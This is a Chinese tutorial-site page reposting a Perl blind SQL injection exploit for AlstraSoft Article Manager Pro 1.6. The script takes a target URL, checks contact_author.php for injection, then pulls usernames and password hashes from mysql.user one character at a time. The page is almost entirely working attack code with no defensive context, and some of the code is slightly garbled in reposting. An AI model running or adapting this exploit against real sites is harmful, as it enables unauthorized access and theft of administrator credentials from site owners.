手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
摘要:#/usr/bin/perl#||Author:GoLd_M#--//-->#--AlstraSoftArticleManagerProBl...

#/usr/bin/perl

#| | Author: GoLd_M

#--//-->

# -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit --

#--//--> Exploit :

use strict;

use LWP::Simple;print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";

print "- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -n";

print " GoLd_M Mahmood_ali Tryag.cc/cc n";

print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";print "nEnter URL (ie: ): ";

chomp(my $url=);if(inject_test($url)) {

print "Injecting.. Please Wait this could take several minutes..nn";

my $details = blind($url);

print "Exploit Success! Admin Details: ".$details;

exit;

}sub blind {my $url = shift;

my $res = undef;

my $chr = 48;

my $substr = 1;

my $done = 1;while($done) {

my $content = get($url."/contact_author.php?userid=1) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM

mysql.user),".$substr.",1))=".$chr."/*");if($content =~ /Previous/ && $chr == 94) { $done = 0; }

elsif($content =~ /Previous/) { $res .= chr($chr); $substr ; $chr = 48; }

else { $chr ; }

}

return $res;

}sub inject_test {my $url = shift;

my $true = get($url."/contact_author.php?userid=1) and 1=1 /*");

my $false = get($url."/contact_author.php?userid=1) and 1=2 /*");if($true =~ /Previous/ && $false !~ /Previous/) {

print "nTarget Site Vulnerable!nn";

return 1;

} else { print "nTarget Site Not Vulnerable! Exiting..n"; exit; }

}

【AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit】相关文章:

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

https加密也被破解 HEIST攻击从加密数据获取明文

教你如何抢掉局域网内所有IP

PHP木马大全 一句话的PHP木马的防范

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

入侵防护系统IPS怎么选择

密码遗忘通关手册 减少不必要的麻烦

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

精品推荐
分类导航